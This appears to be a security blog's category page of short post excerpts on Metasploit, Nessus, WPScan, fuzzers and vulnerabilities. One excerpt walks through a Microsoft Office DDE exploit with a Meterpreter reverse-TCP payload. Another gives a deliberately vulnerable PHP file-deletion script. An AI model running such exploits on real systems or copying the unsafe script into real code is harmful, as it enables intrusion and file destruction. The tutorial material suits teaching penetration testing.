Category: Vulnerabilities

All about Vulnerabilities!

Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rbwget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_deliverymsfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST 192.168.1.10set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploitset PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 …

Metasploit

Setup Metasploit Database

Try reconfigure Metasploit dpkg-reconfigure metasploit-frameworkdpkg-reconfigure metasploit-framework Start postgresql systemctl start postgresql.servicesystemctl start postgresql.service Initialize database msfdb initmsfdb init Run metasploit msfconsolemsfconsole Connect to database db_connect -y /usr/share/metasploit-framework/config/database.ymldb_connect -y /usr/share/metasploit-framework/config/database.yml Rebuild cache db_rebuild_cachedb_rebuild_cache Run postgresql at startup systemctl enable postgresql.servicesystemctl enable postgresql.service

Nessus

Nessus _qdb_open: invalid table of contents

1. You start Nessus and you get an error while connecting to https://127.0.0.1:8834. 2. You run nessuscli and you get an error indicating: blah blah _qdb_open: invalid table of contents Stop Nessus service service nessusd stopservice nessusd stop Repair Nessus /opt/nessus/sbin/nessusd -R/opt/nessus/sbin/nessusd -R Start Nessus service service nessusd startservice nessusd start

Vulnerabilities

Black box WordPress vulnerability scanner

WPScan is a black box WordPress vulnerability scanner. WPSCAN ARGUMENTS –update Update the database to the latest version. –url | -u The WordPress URL/domain to scan. –force | -f Forces WPScan to not check if the remote site is running WordPress. –enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 …

Nessus, NMAP

Import Nmap results into Nessus

Download the Nmap XML Import plugin from http://tenablesecurity.com/documentation/nmapxml.nasl Copy the nmapxml.nasl file into the Nessus plugins directory C:\ProgramData\Tenable\Nessus\nessus\plugins Run a command prompt as Administrator net stop "Tenable Nessus"net stop "Tenable Nessus" Load Nessus new plugins cd C:\Program Files\Tenable\Nessuscd C:\Program Files\Tenable\Nessus nessusd.exe -ynessusd.exe -y Start the Nessus service net start "Tenable Nessus"net start "Tenable Nessus" Under …

Exploits, Fuzzing

Security oriented open source fuzzer

American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary. This substantially improves the functional coverage for the fuzzed code. The compact synthesized corpora produced by the tool are also useful …

Exploits, Malware Analysis, Reverse Engineering

Write exploits, analyze malware, and reverse engineer binary files

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. Overview A debugger with functionality designed …

News, Security, Vulnerabilities

Enable Windows Authenticode signature verification

Microsoft Security Bulletin MS13-098 This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user or application runs or installs a specially crafted, signed portable executable (PE) file on an affected system. This security update is rated Critical for all supported releases of Windows. The …

Injection, PHP, Vulnerabilities

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory: <?php if(isset($_GET[’filename’])) { $filename = $_GET[’filename’]; if(file_exists($filename)) { unlink($filename); } }<?php if(isset($_GET[‘filename’])) { $filename = $_GET[‘filename’]; if(file_exists($filename)) { unlink($filename); } } Open your favorite browser and open url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion As you can see you could delete any file in the …